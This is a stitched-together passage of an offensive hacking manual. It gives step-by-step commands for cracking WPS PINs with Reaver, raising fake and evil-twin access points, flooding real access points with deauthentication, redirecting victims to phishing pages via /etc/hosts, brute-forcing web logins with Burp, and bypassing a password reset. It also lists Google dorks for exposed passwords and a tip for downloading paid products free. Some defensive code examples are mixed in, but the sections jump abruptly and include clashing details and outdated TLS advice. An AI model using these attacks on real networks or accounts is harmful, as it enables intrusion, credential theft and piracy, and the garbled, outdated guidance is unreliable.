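Why the PIN search is this small, as an added example that is not Reaver’s code: wps_checksum is the checksum rule used by wpa_supplicant and Reaver, and WpsOracle is a hypothetical stand-in for the access point that answers the two halves of the PIN separately, the way the real registrar exchange does (a NACK after M4 for a wrong first half, after M6 for a wrong second half). The PINs are made up; no WPS traffic is generated.

```python
MAX_ATTEMPTS = 10**4 + 10**3   # first half, then second half (the checksum digit is derived)


def wps_checksum(pin7):
    """Checksum digit over the seven leading digits (weights 3,1,3,1,3,1,3 from the right)."""
    acc = 0
    while pin7:
        acc += 3 * (pin7 % 10)
        pin7 //= 10
        acc += pin7 % 10
        pin7 //= 10
    return (10 - acc % 10) % 10


def pin_is_valid(pin):
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


def full_pin(first4, last3):
    """Assemble the 8-digit PIN an attacker submits once both halves are known."""
    return first4 + last3 + str(wps_checksum(int(first4 + last3)))


class WpsOracle:
    """Hypothetical AP: reports whether each half is right, as the M4/M6 NACKs do."""

    def __init__(self, pin):
        assert pin_is_valid(pin), "not a valid WPS PIN"
        self._pin = pin          # made-up secret PIN
        self.attempts = 0

    def try_first_half(self, first4):
        self.attempts += 1
        return first4 == self._pin[:4]

    def try_second_half(self, first4, last3):
        self.attempts += 1
        return full_pin(first4, last3) == self._pin


def brute_force_pin(ap):
    """Search the halves one after the other: at most 10^4 + 10^3 attempts, never 10^7."""
    for i in range(10**4):
        first4 = f"{i:04d}"
        if ap.try_first_half(first4):
            break
    else:
        return None
    for j in range(10**3):
        last3 = f"{j:03d}"
        if ap.try_second_half(first4, last3):
            return full_pin(first4, last3)
    return None


if __name__ == "__main__":
    ap = WpsOracle("98765430")
    print(brute_force_pin(ap), ap.attempts, "attempts")
```

Reaver’s progress output (“Trying pin 98760000”, then pins sharing the found first half) is exactly this two-phase loop, and the WPS lock-out mentioned above is the only thing the access point can do about it short of turning WPS off.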

Command:

reaver -i mon0 -b <BSSID> -d 0

Setting Up a Fake Access Point with SET to PWN Users
The next attack we talk about is setting up a rogue or fake access point. Our goal is to make the victim connect to it, and since we control the access point, we can redirect traffic as we want. We will use SET (the Social-Engineer Toolkit) to raise the fake access point. Though there are other tools that can be used here, such as airbase-ng and Gerix, I find SET the simplest.

Step 1—From the “Social-Engineering Attacks” menu, select the “Wireless Access Point Attack Vector.”

Step 2—We can see from the description that we require four utilities to launch this attack vector, namely, airbase-ng, airmon-ng, dnsspoof, and dhcp3. Except for dhcp3, these tools come preinstalled with BackTrack 5. Therefore, we need to install dhcp3 in order to launch this attack vector.

Step 3—We use the “apt-get install dhcp3-server” command to install dhcp3 inside BackTrack. It is shown as already installed in the image, since I had installed it earlier. If you face any problems while installing the dhcp3 server, I recommend consulting the backtrack-linux.org forum.

Step 4—After you have installed the dhcp3 server, choose the first option in SET to start setting up the fake access point. Next, SET takes you to the /etc/default/dhcp3-server file, where you need to specify the interface on which you would like the DHCP server to serve DHCP requests. We add our wireless interface “wlan0” for serving DHCP requests.

Step 5—Next, it asks for the DHCP range to assign to the clients that connect to our access point. I prefer 192.168.10.100-254, since it is the one used most often.

Step 6—Finally, we enter our wireless network interface, which is wlan0; yours might be different, so run iwconfig to check your wireless interfaces.

Now we are all set, and SET will launch our fake access point with the SSID “linksys”, which is its default name. It will have no encryption set.

As a side note, if we would like to change the name of our wireless access point, we can do so by modifying the value of the ACCESS_POINT_SSID parameter in the SET config file in the /pentest/exploits/set/config directory.

Attack Scenario Once the victim connects to our fake access point, we can perform various types of attacks against him. We can either perform an ARP poisoning attack or a phishing attack or just set up a malicious webserver to redirect all the traffic to our webserver, whenever the victim browses websites

Mail:mtahirzahid@yahoo.com

Page 57


Power Of Hacking such as facebook.com or google.com. This can be easily done by editing the contents of the /etc/ hosts file. Since we are in control of the access point, we can manipulate things that would be presented to the victim. 127.0.0.1 is our home address, so we would edit the /etc/hosts file to and we would point the hosts that we want to target say Facebook, Google, twitter etc to our Home address. So this means that the next time when victim would enter the target url in his browser say facebook.com he would be redirected to our address where we could launch different types of client side attacks (in the power of hacking book). The following screenshot explains how the edits would look like:

After you have manipulated the records, whenever the victim browses his favorite websites, say google.com, facebook.com, or yahoo.com, he will be redirected to our local IP address, where we would host our malicious SET webserver or a phishing page. You can also use Evilgrade to compromise the client side update process.
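As an added example (not from the book or from SET), here is a small Python check a defender can run over an /etc/hosts file to catch the kind of redirection edit just described: public hostnames pinned to loopback or private addresses. The hosts content and the list of public names are constructed for the example.

```python
import ipaddress

# Constructed sample /etc/hosts content (not from a real system). The last
# three entries are the kind of redirection edits described in the text.
SAMPLE_HOSTS = """\
127.0.0.1   localhost
::1         localhost ip6-localhost
192.168.1.10 fileserver.internal
# entries below were not placed here by the administrator
127.0.0.1   facebook.com www.facebook.com
127.0.0.1   google.com
192.168.10.105 twitter.com
"""

# Hostnames that should always resolve to public Internet addresses. A real
# audit would use the organisation's own list; this one is constructed.
PUBLIC_NAMES = {"facebook.com", "www.facebook.com", "google.com",
                "twitter.com", "yahoo.com"}


def parse_hosts(text):
    """Return (address, hostname) pairs from hosts-file text, ignoring comments."""
    entries = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()   # drop trailing/whole-line comments
        if not line:
            continue
        parts = line.split()
        try:
            addr = ipaddress.ip_address(parts[0])
        except ValueError:
            continue                          # malformed line: skip, do not crash
        for name in parts[1:]:
            entries.append((addr, name.lower()))
    return entries


def suspicious_overrides(text, public_names=PUBLIC_NAMES):
    """Flag public hostnames pinned to loopback, private or link-local addresses."""
    findings = []
    for addr, name in parse_hosts(text):
        if name not in public_names:
            continue
        if addr.is_loopback or addr.is_private or addr.is_link_local:
            findings.append((name, str(addr)))
    return findings


if __name__ == "__main__":
    for name, addr in suspicious_overrides(SAMPLE_HOSTS):
        print(f"WARNING: {name} is pinned to {addr} in hosts file")
```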

Evil Twin Attack

An evil twin attack is a very popular type of social engineering attack against the client. The idea behind this attack is to create an access point with the same name as the victim's and cause a denial of service to the original access point. This would make our victim connect to our fake access point, thinking that it's the original. Furthermore, an attacker would also spoof the MAC address of his interface to exactly match the MAC address of the real access point, so that it becomes much more difficult to detect. Let's see how we would perform this attack in the real world:

1. We would use airodump-ng to scan for all neighboring access points.
2. We would note down the BSSID and change the MAC address of our interface to exactly match the BSSID of the real access point.
3. Then we would launch a fake access point with the same name as the original one.
4. Finally, we would perform a deauthentication attack with mdk3 or aireplay.

Scanning the Neighbors

We used the “airodump-ng mon0” command to scan for all the wireless networks. Let's suppose our target access point is “$oulhunter”, which has the BSSID 20:10:7A:C6:49:DF and is on channel 11.

Spoofing the MAC

The next task would be to spoof our MAC address with the MAC address (BSSID) of the victim's access point. We can easily do this with macchanger, for which we would need to bring the wlan0 interface down, use the -m parameter to set our MAC address, and then bring it up. This is discussed in more detail in the “Bypassing MAC filtering” section in this chapter.

Commands:
ifconfig wlan0 down (bring the interface down so we can spoof the MAC)
macchanger -m 20:10:7a:c6:49:df mon0 (set the MAC address to the target BSSID)
ifconfig mon0 up

Setting Up a Fake Access Point

The next step would be to set up a fake access point with the exact name “$oulhunter”. We have already learned how to do this, so I won't go into the details now.

Causing Denial of Service on the Original AP

Our final step would be to cause a denial of service on the original AP. We could use aireplay to perform a deauthentication attack on the access point; however, here I will introduce you to a new tool called “mdk3”, which is specifically meant for causing denial of service to wireless access points. It supports a wide variety of flood attacks such as authentication flood and beacon flood. In this particular scenario, we will use mdk3 to launch a deauthentication attack to forcefully disconnect every client from the access point so they can connect to ours.

Step 1—We would create a text file with the name “target” where we will specify the BSSID of our target. The d mode selects a deauthentication attack, the -b parameter names the blacklist file containing the target BSSID, and the -c parameter specifies the channel, which in this case would be 11 since my access point is on channel 11. Command:

mdk3 mon0 d -b target -c 11

Since the signal strength of our access point would be strong, our victim would connect to us and we could launch attacks against them.

Conclusion

In order to overcome physical limitations, more and more home and corporate users are moving toward wireless networks, without any concern for the issues that wireless networks can bring. Even though access points can be completely secure and the pre-shared keys complex enough that they can't be cracked, there is still room for possible attacks on clients—the weakest links.

Web Hacking: Attacking the Authentication

Authentication in web security is the part of an application that verifies that it is the correct user who accesses the private/protected information. In this section, we will talk about authentication-based attacks. Some of the common vulnerabilities against authentication are as follows:

◾ Credentials sent over HTTP. Since they are unencrypted, an attacker on the LAN/WLAN can launch an MITM attack. See the Network Sniffing chapter (Chapter 6).
◾ Default passwords.
◾ Weak or simple credentials that can be cracked with brute force or dictionary attacks.
◾ Bypassing authentication by using various vulnerabilities.
◾ Abusing the reset/forgotten password functionality.
◾ Passwords being stored in local storage, making it easy for an attacker to extract them by using an XSS vulnerability.

In this section, most of our focus would be on some of the commonly used vulnerabilities to bypass authentication, such as SQL injection and XPath injection. But before that, let's talk about some low-profile attacks.

Username Enumeration

Sometimes it's possible to check whether a given user exists in the database or not based upon the error messages that the application displays. This could be very helpful in cases where you want to conduct a brute force attack or an attack against a particular user. It could also aid you when exploiting the password reset feature. Let's take a look at an example of how this works.

Invalid Username with Invalid Password

We have a popular website xyz.com. When we enter an invalid username with an invalid password, the following error is displayed: “Username is invalid,” indicating that the particular username was not found in the website's database.

Valid Username with Invalid Password

When we enter a valid username with an invalid password, the following error is displayed: “Password is incorrect.”
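Added example, not code from the book: a Python login handler in the leaky style just described, beside a hardened one that returns the same message and does the same hashing work whether or not the username exists. The user store and its password are constructed.

```python
import hashlib
import hmac
import os
import secrets

ITERATIONS = 100_000


def _make_record(password):
    """Store a password as a salted PBKDF2-SHA256 hash (constructed user store)."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return {"salt": salt, "hash": digest}


# Constructed sample user; the plaintext appears only to build the record.
USERS = {"admin": _make_record("correct horse battery staple")}

# Dummy record so that unknown usernames still cost one PBKDF2 computation,
# which keeps the response time the same for existing and missing users.
_DUMMY = _make_record(secrets.token_hex(16))


def _verify(record, password):
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), record["salt"], ITERATIONS)
    return hmac.compare_digest(candidate, record["hash"])


def login_leaky(username, password):
    """The pattern described above: the error text reveals which part was wrong."""
    record = USERS.get(username)
    if record is None:
        return (False, "Username is invalid")
    if not _verify(record, password):
        return (False, "Password is incorrect")
    return (True, "Welcome")


def login_uniform(username, password):
    """Hardened form: one generic message, same work done in every branch."""
    record = USERS.get(username)
    ok = _verify(record if record is not None else _DUMMY, password)
    if record is None or not ok:
        return (False, "Invalid username or password")
    return (True, "Welcome")


if __name__ == "__main__":
    for user in ("nobody", "admin"):
        print("leaky  :", login_leaky(user, "wrong"))
        print("uniform:", login_uniform(user, "wrong"))
```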

Not to mention, the website provided is well known; however, this isn't a big issue for them because most of their usernames are already public in their forums, listings, and marketplaces, but certainly, this can still be an issue in several other applications.

Enabling Browser Cache to Store Passwords

Another bad security practice that is often followed is developers leaving the autocomplete function on for password fields, which lets the passwords be saved in the browser cache, allowing an attacker to access the password if he can somehow access the browser cache. We can check if autocomplete is enabled by inspecting the input element's markup:

<input type="text" name="foo" autocomplete="on"/>

To protect against this issue, it's recommended that autocomplete be disabled.

Brute Force and Dictionary Attacks

In the Remote Exploitation chapter (Chapter 7), we discussed how we can use brute force or dictionary attacks to crack various services such as FTP, SSH, and RDP by using tools such as hydra, Medusa, and ncrack. However, we didn't talk about brute forcing HTTP authentication schemes in Chapter 7, as it is more appropriate to discuss here.

Types of Authentication

Let's talk about some of the authentication mechanisms and their insecurities before looking at brute force attacks. There are three types of HTTP-based authentication schemes used primarily:

HTTP Basic Authentication

HTTP basic authentication is one of the first authentication mechanisms that were introduced. It works as follows: When we send a GET request to the protected resource, the webserver responds with a log-in screen and sets a “WWW-Authenticate” header. Our credentials are then sent to the server in the “Authorization” header in base64-encoded form. Upon receiving the header, the server decodes the base64 string to plain text and compares it with the information stored in the authorization file. Upon submitting a correct username and password, the client gets access to the protected resource, and a “401 Unauthorized” response from the server if an incorrect username/password is submitted. Now, obviously, the problem with this type of authentication is that an attacker could launch a man in the middle attack and easily decode the base64 string containing the username and the password. Let's try analyzing it in our favorite web proxy, “Burp Suite.” If you haven't set up Burp Suite, I would recommend you to see the “Information Gathering Techniques” chapter (Chapter 3), where I have explained step by step how to install and run Burp Suite.

As we can see, a base64 string is being sent to the server, which the server would decode and match with the password set in .htaccess in case you are on an apache webserver. Let’s try sending the string to burp’s decoder.

In the decoder, you would see a drop-down menu, which would ask you for the type of string that is submitted as input. We will select base64. It would successfully decode the contents of the base64 string, which happen to be admin:password in this case, where “admin” is the username and “password” is the password.

HTTP Digest Authentication

HTTP digest authentication was the modified and improved version of HTTP basic authentication. One of the major improvements was that it did not send the password in plain form. The digest scheme is similar to the NTLM protocol, which is discussed in the previous Power of Hacking book. It uses the MD5 hashing algorithm over the credentials, a nonce (a random value), and the URL, and the result is sent to the server. However, MD5 hashes are also prone to vulnerabilities and could be cracked easily. So this is not the protocol to rely on for authentication, although it does make things a bit more difficult for an attacker, since the attacker has to crack the MD5 hash to obtain the credentials.

Form-Based Authentication

Form-based authentication is the recommended method for authenticating a user. The credentials are submitted by either the POST or GET method over HTTP or HTTPS. Although it's not a good security practice to send sensitive credentials by the GET method, as they can easily be leaked via the referrer header or other attacks, we still see it being used. When the credentials are submitted, the server compares them with the ones that are saved in the database and authenticates the user if they are correct. If the Webmaster is storing the passwords as MD5 hashes or with some other hashing algorithm, then the passwords submitted by users are first hashed with the same algorithm and then compared to the ones stored in the database. HTTP is a plain text protocol, which means that everything sent across it goes as plain text, which leaves it vulnerable to eavesdropping or MITM attacks. Therefore, for authentication purposes and wherever sensitive data are transmitted, “HTTPS” is used, although some websites don't implement it on all pages since it consumes more server resources. Insufficient transport layer protection was in the OWASP Top 10 list for 2012, although it was eliminated from the list in 2013. There are tons of websites that do implement HTTPS, but not properly. They use HTTP for the initial log-in and then change to HTTPS. Since the initial part of the communication is left unencrypted, it's still vulnerable to eavesdropping or an MITM attack. An example follows: Etsy.com is a popular website that secures a good spot in the Alexa Top 200, and it uses HTTPS for encrypted communications. However, the website doesn't implement it correctly; when we try to log in to the website and click on the “Sign in” button, the form loads over HTTP, and only after we enter the credentials is it changed to HTTPS, which means that the initial communication is left unencrypted.
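To make the Basic and Digest descriptions above concrete, here is an added Python example (not from the book) that builds and decodes a Basic Authorization header and computes the Digest response (RFC 2617 without qop) from the credentials, nonce and URI; the last function shows why a captured Digest response still exposes a weak password, since verifying a guess costs one MD5 computation. Credentials, realm and nonce are constructed values.

```python
import base64
import hashlib


def basic_header(username, password):
    """Build the Authorization header value a client sends for HTTP Basic auth."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Basic {token}"


def decode_basic(header_value):
    """Recover (username, password) from a Basic header, as Burp's decoder would.

    The username cannot contain a colon, so splitting on the first colon is exact.
    """
    scheme, _, token = header_value.partition(" ")
    if scheme != "Basic":
        raise ValueError("not a Basic credential")
    user, _, pwd = base64.b64decode(token).decode().partition(":")
    return user, pwd


def digest_response(username, realm, password, method, uri, nonce):
    """RFC 2617 Digest without qop: MD5(MD5(user:realm:pass):nonce:MD5(method:uri))."""
    ha1 = hashlib.md5(f"{username}:{realm}:{password}".encode()).hexdigest()
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    return hashlib.md5(f"{ha1}:{nonce}:{ha2}".encode()).hexdigest()


def guess_digest_password(observed, username, realm, method, uri, nonce, wordlist):
    """Why Digest still needs a strong password: an eavesdropper who saw the
    challenge (realm, nonce) and the response can test guesses offline, exactly
    as the server verifies them. Returns the matching guess or None."""
    for guess in wordlist:
        if digest_response(username, realm, guess, method, uri, nonce) == observed:
            return guess
    return None


if __name__ == "__main__":
    # Constructed sample exchange, not captured from any real server.
    hdr = basic_header("admin", "password")
    print(hdr, "->", decode_basic(hdr))
    resp = digest_response("admin", "Protected Area", "password", "GET", "/admin/", "c0nstructedN0nce")
    print("Digest response:", resp)
```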


Another issue that I often see with websites is the use of old and deprecated versions of SSL. SSL 2.0 was deprecated a long time ago, since lots of weaknesses were found in the protocol as it used weak ciphers. Today, it's recommended to use SSL 3.0 or TLS 1.0, though there have been known issues with SSL 3.0. It's the same with TLS 1.0, so TLS 1.2 is recommended instead. However, we don't see it being implemented much, since old browsers don't support it. We can use a neat tool in BackTrack called “sslscan,” which helps us identify websites that use outdated SSL versions. Since this was already discussed in the “Information Gathering Techniques” chapter of the previous Power of Hacking book, it won't be covered here; instead we will talk about a great Firefox add-on called “Calomel Scan”, which can easily help you identify weak implementations of SSL. Based on the SSL cipher strength, the scan gives a grade color; a red grade indicates a weak implementation of SSL in your application.

Exploiting Password Reset Feature

Every website that supports authentication would surely have a password reset feature where users can reset the passwords for their accounts. There is no single bug that exploits the password reset feature, the reason being that applications may be coded in different ways, unless you find a password reset bug in a content management system such as WordPress or Joomla, which would affect all the websites running that content management system. One of the popular bugs in Joomla was a password reset vulnerability where the token was not checked on the server end; there have been similar known issues with WordPress, Drupal, etc. You can review more technical details at the following link:

◾ http://www.exploit-db.com/exploits/6234/

Etsy.com Password Reset Vulnerability

Back in 2012, Etsy.com was suffering from the same password reset vulnerability. The issue, found by security researcher Yogesh Jaygadkar, was that the token that was supposed to check that it was the same user requesting a new password was not being validated on the server side. This is a very common issue you would find with many websites. Here is the request that etsy.com users made when they applied for a new password:

https://www.etsy.com/confirm.php?email=[Email Address]&code=[Token code]&action=reset_password&utm_source=account&utm_medium=trans_email&utm_campaign=forgot_password_1

The user e-mail address and the token code are the areas of interest; the user would enter an e-mail address, and the token would be checked to confirm that the request is valid, which would have been the normal behavior of this application. But in this case, the token is not validated on the server side, so all the attacker would need to do is remove the token field and enter the victim's e-mail address instead of his own. The request would look like the following:

https://www.etsy.com/confirm.php?email=[victim’s email ID]&action=reset_password&utm_source=account&utm_medium=trans_email&utm_campaign=forgot_password_1
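Added example (not Etsy's code or the book's): a Python sketch of the flawed reset handler, which never checks the code parameter, next to a hardened one that requires an unpredictable, expiring, single-use token bound to the requesting e-mail and compares it in constant time. The token store, TTL and parameter names are assumptions for the example.

```python
import hmac
import secrets
import time

# In-memory store of outstanding reset tokens: email -> (token, expiry time).
# Constructed for the example; a real application would persist this server-side.
RESET_TOKENS = {}
TOKEN_TTL = 15 * 60   # seconds a reset link stays valid (assumed value)


def issue_reset_token(email, now=None):
    """Create an unpredictable token (CSPRNG, 256 bits) bound to one e-mail and an expiry."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    RESET_TOKENS[email] = (token, now + TOKEN_TTL)
    return token


def reset_vulnerable(params):
    """The flaw described above: the code parameter is never examined, so a
    request with only email and action succeeds for any address."""
    if params.get("action") != "reset_password" or "email" not in params:
        return False
    return True   # the password for params["email"] would be reset here


def reset_hardened(params, now=None):
    """Require a valid, unexpired token for that exact e-mail; compare in
    constant time; burn the token after one successful use."""
    now = time.time() if now is None else now
    if params.get("action") != "reset_password":
        return False
    email, code = params.get("email"), params.get("code")
    if not email or not code:
        return False                     # missing token is a hard failure
    stored = RESET_TOKENS.get(email)
    if stored is None:
        return False                     # no outstanding request for this address
    token, expiry = stored
    if now > expiry:
        del RESET_TOKENS[email]
        return False
    if not hmac.compare_digest(token.encode(), code.encode()):
        return False
    del RESET_TOKENS[email]              # single use
    return True


if __name__ == "__main__":
    victim = "victim@example.com"        # constructed address
    print("vulnerable, no code:", reset_vulnerable({"email": victim, "action": "reset_password"}))
    print("hardened, no code  :", reset_hardened({"email": victim, "action": "reset_password"}))
```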

Another thing to check with the generated tokens is whether they are predictable; if so, then an attacker can easily guess the tokens and reset the victim's password.

Attacking Form-Based Authentication

Step 1—Our first step would be to perform username enumeration; this can be easily done by entering an incorrect password along with the username whose presence in the database you want to check. In this case, we found that the username “admin” exists.


Step 2—Next, we would trap the authentication request with burp suite and then press “Ctrl+I” to send it to the intruder.

Step 3—Burp would automatically highlight the input fields that you can try to run your attack against; however, we are interested only in the password field with the parameter (pwd). So we will click on the “Clear” button at the right to clear all the inputs and then click the “Add” button twice. Finally, we would choose the “attack type.” Burp Suite supports multiple attack types; a description of all the attack types can be found in Burp Suite's official documentation, for which I will provide the link later. For the sake of this demonstration, we will choose “Sniper”; this attack type is useful when we are trying to inject our payloads into a single position.

Step 4—We will now move to the “Payloads” tab, and under the payload options, we will load the wordlist against which we want to test this particular form. For demonstration purposes, I would use the list of the top 500 worst passwords by Symantec, for which I will provide the link later.

Step 5—Once we have everything set up, we will click on “Intruder” at the top and click on “Start Attack,” and it will try the wordlist against our target.

On the 15th request, we see a difference in the content length and the status, which probably means that we have correctly guessed the password. Please note that the success rate of this attack depends solely upon the quality of your wordlist.

Brute Force Attack

To launch a brute force attack, we need to make a slight change in the “Payloads” tab. We will change the payload type to “Brute forcer”. We will make modifications to the charset and length depending upon the requirement; as you increase the max length, the total number of permutations increases. So in this case, we would use the lower alphanumeric charset, which contains all the lowercase letters and the digits 0 to 9, and we would set the minimum and maximum length to 4. You may increase it if you want.

Note: Please note that brute force attacks are pretty slow, and most of the time you would not be performing them in a penetration test, as they can take a significant amount of time and resources if you are brute forcing a complex password.

That's pretty much it; from the “Intruder” tab, you would click on “Start Attack,” and it would try all possible combinations of the alphanumeric charset up to a maximum character length of 4.

Attacking HTTP Basic Auth

The method for attacking HTTP basic authentication is different, since we need to send a base64-encoded payload, which the server decodes and compares with the .htpasswd file. Also, the username and the password that are encoded and sent to the server must be separated by a colon for our attack to work.

Step 1—We will start by intercepting the authentication request and then send it to Burp Intruder.

Step 2—Again, by default, Burp Intruder would pinpoint the possible positions to be brute forced; however, we are interested in attacking only the authorization header that would be sent to the server, so we would click the “Add” button to lock the position.

Step 3—The next step would be to define the usernames that would be used for brute forcing. We would set the payload type to “Custom iterator” so we can add our separator and the usernames that we want to test. Also, in the “Separator for Position 1,” we will add a colon.

Step 4—Next, we would need to select the passwords that we are testing the usernames against; for that, we select number “2” from the drop-down menu named “positions.”

Step 5—Finally, we need to encode our payload with base64 encoding, for which we need to define a rule under the “Payload Processing” tab. To add a rule, select rule type to “Encode” and encoding type to “Base64-encode.”

Information Gathering Techniques

In general, all information gathering techniques can be classified into two main categories:

1. Active information gathering
2. Passive information gathering

Sources of Information Gathering

There are many sources of information; the most important ones are as follows:

Social media websites
Search engines
Forums
Press releases
People search
Job sites

Copying Websites Locally

There are many tools that can be used to copy websites locally; however, one of the most comprehensive tools is httrack. The local copy can then be used to investigate the website further. For example, let's suppose that the file permissions of a configuration file are not set properly. The configuration might reveal some important information about the target, for example, a username and password.

If you are on Linux, you can use the wget command to copy a webpage locally. Another great tool is Website Ripper Copier, which has a few additional functions compared to httrack.

Tracing the Location

You would need to know the IP address of the webserver in order to trace its exact location. There are several methods to figure it out. We will use the simplest one, that is, the ping command. The ping command sends ICMP echo requests to check if the website is up. It's used for network troubleshooting purposes. From your command line, type the following:

ping www.techlotips.com

The output would be as follows:

C:\Users\Tahir>ping www.tahirhacker.com
Pinging tahirhacker.com [40.22.81.62] with 32 bytes of data:
Reply from 40.22.81.62: bytes = 32 time = 304ms TTL = 47
Reply from 40.22.81.62: bytes = 32 time = 282ms TTL = 47
Reply from 40.22.81.62: bytes = 32 time = 291ms TTL = 47
Reply from 40.22.81.62: bytes = 32 time = 297ms TTL = 47

So we now know that the IP address of our target is 40.22.81.62. After determining the webserver's IP, we can use some online tools to track the exact location of the webserver. One such tool is IPTracer, which is available at http://www.ip-adress.com/ip_tracer/yourip. Just replace “yourip” with your target's IP, and it will show you the location of the webserver via Google Maps.

Traceroute

Traceroute is a very popular utility available in both Windows and Linux. It is used for network orientation. By network orientation I don't mean scanning a host for open ports or scanning for services running on a port. It means figuring out how the network topology, firewalls, load balancers, control points, etc. are implemented on the network. A traceroute uses the TTL (time to live) field of the IP header, sending packets with increasing TTL values in order to determine each system along the path. The time to live value decreases every time the packet reaches a hop on the network (i.e., router to server is one hop). There are three different types of traceroutes:

1. ICMP traceroute (which is used in Windows by default)
2. TCP traceroute
3. UDP traceroute

ICMP Traceroute

Microsoft Windows by default uses ICMP traceroute; however, after a few hops, you will get a timeout, which indicates that there might be a device like an IDS or firewall that is blocking ICMP echo requests.

From this image you can see that the ICMP echo requests timed out after seven requests.

TCP Traceroute

Many devices are configured to block ICMP traceroutes. This is where we try TCP or UDP traceroutes, also known as layer 4 traceroutes. TCP traceroute is available by default in BackTrack. If you can't find it, just use the following command:

apt-get install tcptraceroute

Usage

From the command line, you would need to issue the following command:

tcptraceroute www.google.com

UDP Traceroute

Linux also has a traceroute utility, but unlike Windows, it uses the UDP protocol for the traceroute. In Windows, the command for traceroute is “tracert”. In Linux, it's “traceroute”.

Usage

traceroute www.target.com

NeoTrace

NeoTrace is a very fine GUI-based tool for mapping out a network.

Cheops-ng

Cheops-ng is another remarkable tool for tracing and fingerprinting a network. This image speaks a thousand words.

Google Hacking

Google searches can be more than a treasure for a pentester, if he uses them effectively. With Google searches, an attacker may be able to gather some very interesting information, including passwords, on the target. Google has developed a few search parameters in order to improve targeted search. However, they are abused by hackers to search for sensitive information via Google.

Some Basic Parameters

Site

The site parameter is used to search for all the web pages of a site that are indexed by Google. Webmasters have the option of specifying what pages should or should not be indexed by Google, and this information is saved in the robots.txt file, which an attacker can easily view.

Example

www.tahirhacker.com/robots.txt

As you can see from this screenshot, the Webmaster has disallowed some directories from being indexed. Sometimes, you may find some interesting information in them, such as admin pages and other sensitive directories that the webmaster would not like the search engines to crawl. Coming back to the site parameter, let's take a look at its usage.

Usage

site:www.tahirhacker.com

This query will return all the web pages indexed by Google.

Link

link:www.tahirhacker.com

This search query will return all the websites that have linked to techlotips.com. These websites may contain some interesting information regarding the target.

Intitle

The intitle keyword is used to return results with a specific title.

Usage

site:www.tahirhacker.com intitle:ftp users

This query will return all the pages from techlotips that contain the title “ftp users”.

Note: This usage query is just for demonstration, as it may not work in most cases.

Inurl

Inurl is a very useful search query. It can be used to return URLs with specific keywords.

site:www.tahirhacker.com inurl:ceo names

This query will return all URLs with the given keyword.

Filetype

site:www.msn.com filetype:pdf

You can also ask Google to return specific files such as PDF and .docx by using the filetype query.

TIP regarding Filetype

Lots of Webmasters of websites that sell e-books and other products forget to block the URL from being indexed. Using filetype, you can search for these files, and if you are lucky, you may be able to download products for free.

Here is the table that summarizes the Google dorks along with their functions:

Google Hacking Database:Google hacking database is set up by the offensive security guys, the ones behind the famous BackTrack distro. Google hacking database has a list of many Google dorks that could be used to find usernames, passwords, e-mail list, password hashes, and other important information.

So let's just ask the website to filter out all the Google dorks related to files that contain passwords. From the drop-down menu, select the option “Files containing passwords.” Now, you would see a list of all the dorks that could be used to find passwords. Let's try one of them.

Out of all the dorks, filetype:sql inurl:wp-content/backup-* seemed really interesting to me, so I gave it a try on Google. Since MySQL passwords are also backed up along with other files, incorrect permissions may reveal some interesting information. What the above query asks for is SQL files with the URL pattern wp-content/backup. Fortunately, with a little bit of searching, I was able to find the “WordPress MySQL database” of a website exposed to the public.

Hackersforcharity.org/ghdb

Another database that contains a collection of some interesting Google dorks.

Xcode Exploit Scanner

Xcode Exploit Scanner is an automated tool that uses some common Google dorks to scan for vulnerabilities such as SQLi and XSS.

Nslookup

Nslookup is available in both Windows and Linux OS. Let's say that we want the DNS servers to return all the mail server records of an organization. We would do the following:

Step 1—Issue the nslookup command from the command prompt.
Step 2—Issue the following command: set type=mx
Step 3—Next, we would enter the domain: www.msn.com

The query returned the mail servers for msn.com. We can also ask for all the DNS servers for that domain by using the set type=ns command.

The query has returned all the name servers associated with ifixit.com.

Linux Basics

Subdirectories of the root directory:

/bin: Common programs, shared by the system, the system administrator, and the users.
/boot: The startup files and the kernel, vmlinuz. In some recent distributions also grub data. Grub is the GRand Unified Boot loader and is an attempt to get rid of the many different boot-loaders we know today.
/dev: Contains references to all the CPU peripheral hardware, which are represented as files with special properties.
/etc: The most important system configuration files are in /etc; this directory contains data similar to those in the Control Panel in Windows.
/home: Home directories of the common users.
/initrd: (on some distributions) Information for booting. Do not remove!
/lib: Library files, includes files for all kinds of programs needed by the system and the users.
/lost+found: Every partition has a lost+found in its upper directory. Files that were saved during failures are here.
/misc: For miscellaneous purposes.
/mnt: Standard mount point for external file systems, for example, a CD-ROM or a digital camera.
/net: Standard mount point for entire remote file systems.
/opt: Typically contains extra and third-party software.
/proc: A virtual file system containing information about system resources. More information about the meaning of the files in proc is obtained by entering the command man proc in a terminal window. The file proc.txt discusses the virtual file system in detail.
/root: The administrative user's home directory. Mind the difference between /, the root directory, and /root, the home directory of the root user.
/sbin: Programs for use by the system and the system administrator.
/tmp: Temporary space for use by the system, cleaned upon reboot, so don't use this for saving any work!
/usr: Programs, libraries, documentation, etc., for all user-related programs.
/var: Storage for all variable files and temporary files created by users, such as log files, the mail queue, the print spooler area, space for temporary storage of files downloaded from the Internet, or to keep an image of a CD before burning it.

Most Common and Important Commands

ls: list directory contents
cd: change directories
rm: remove files or directories
chmod: change file mode bits, from read to write and vice versa
chown: change ownership of a file
chgrp: change group ownership
screen: screen manager with VT100/ANSI terminal emulation; creates a background process with a terminal emulator
ssh: secure shell for remote connection
man: manual/help
pwd: print name of current/working directory
cd ..: move up one directory
mkdir: create a new directory
rmdir: remove a directory
locate: find a file within a directory or the system
whereis: find a file within the system
cp: copy a file
mv: move a file/directory or rename a file or directory
mount: mount a device such as a CD-ROM/USB
zip: compress directories/files
umount: unmount (eject) a device such as a USB drive
df: show disk usage of mounted partitions
cat: concatenate and print files
ifconfig: show interface details
w: show who is logged on and what they are doing
top: show system task manager
netstat: show local or remote established connections
nslookup: query Internet name servers interactively
dig: DNS utility
touch: create a file
nano: file editor
vi: vim file editor
free -h: check free memory

What Is BackTrack?


